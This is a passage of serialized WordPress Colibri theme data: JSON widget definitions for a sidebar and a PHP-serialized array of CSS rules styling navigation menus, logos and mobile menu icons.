251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":170,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\"]},{\"id\":171,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\"]},{\"id\":172,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\"]},{\"id\":173,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\"]},{\"id\":174,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\"]},{\"id\":175,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\"],\"v\":\"1.1\"},{\"id\":176,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\"]},{\"id\":177,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":178,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\"],\"v\":\"1.1\"},{\"id\":179,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\"],\"v\":\"1.1\"},{\"id\":180,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\"],\"v\":\"1.1\"},{\"id\":181,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\"],\"v\":\"1.1\"},{\"id\":182,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\"],\"v\":\"1.1\"},{\"id\":183,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":184,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\"]},{\"id\":185,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":186,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\"]},{\"id\":187,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\"]},{\"id\":188,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\"]},{\"id\":189,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\"]},{\"id\":190,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\"]},{\"id\":191,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\"],\"v\":\"1.1\"}]\";s:7:\"cssById\";a:191:{i:1;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:2;a:3:{s:7:\"desktop\";s:369:\"#colibri .style-2 {\n  animation-duration: 0.5s;\n  padding-top: 20px;\n  padding-right: 15px;\n  padding-bottom: 20px;\n  padding-left: 15px;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n  background-color: #ffffff;\n  background-image: none;\n  padding-top: 10px;\n  padding-bottom: 10px;\n  box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:189:\"#colibri .style-2 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";}i:3;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:4;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-4 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:5;a:3:{s:7:\"desktop\";s:557:\"#colibri .style-5-image {\n  max-height: 70px;\n}\n#colibri .style-5 a,#colibri .style-5  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n  font-size: 24px;\n}\n#colibri .style-5 .logo-text {\n  color: #FFFFFF;\n}\n#colibri .h-navigation_sticky .style-5-image,#colibri .h-navigation_sticky.style-5-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-5 a,#colibri .h-navigation_sticky .style-5  .logo-text,#colibri .h-navigation_sticky.style-5 a,#colibri .h-navigation_sticky.style-5  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:6;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-6 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:7;a:3:{s:7:\"desktop\";s:38:\"#colibri .style-7 {\n  height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:8;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-8 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:9;a:3:{s:7:\"desktop\";s:8524:\"#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: flex-end;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: #FFFFFF;\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(166, 220, 244);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(166, 220, 244);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: rgb(166, 220, 244);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul {\n  background-color: #ffffff;\n  background-image: none;\n  margin-right: 5px;\n  margin-left: 5px;\n  box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: rgb(255, 255, 255);\n  background-image: none;\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: #03a9f4;\n  background-image: none;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-9 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: rgb(166, 220, 244);\n  background-image: none;\n  height: 3px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-9 \n      ul.colibri-menu.solid-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0%;\n  border-top-right-radius: 0%;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0%;\n  border-bottom-right-radius: 0%;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > ul {\n  margin-top: 0px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n  height: 0px;\n  width: 100% ;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .h-navigation_sticky .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-9 \n      ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-9 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-9 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: #03a9f4;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:10;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-10-offscreen {\n  background-color: #222B34;\n  background-image: none;\n  width: 300px !important;\n}\n#colibri .style-10-offscreenOverlay {\n  background-color: rgba(0,0,0,0.5);\n  background-image: none;\n}\n#colibri .style-10  .h-hamburger-icon {\n  background-color: rgba(0, 0, 0, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: solid;\n  border-top-left-radius: 100%;\n  border-top-right-radius: 100%;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 100%;\n  border-bottom-right-radius: 100%;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: solid;\n  fill: white;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  width: 24px;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:11;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:12;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:13;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-13 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:14;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-14-image {\n  max-height: 70px;\n}\n#colibri .style-14 a,#colibri .style-14  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-14-image,#colibri .h-navigation_sticky.style-14-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-14 a,#colibri .h-navigation_sticky .style-14  .logo-text,#colibri .h-navigation_sticky.style-14 a,#colibri .h-navigation_sticky.style-14  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:15;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:16;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-16 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:17;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-17  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-17  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-17  >  div > 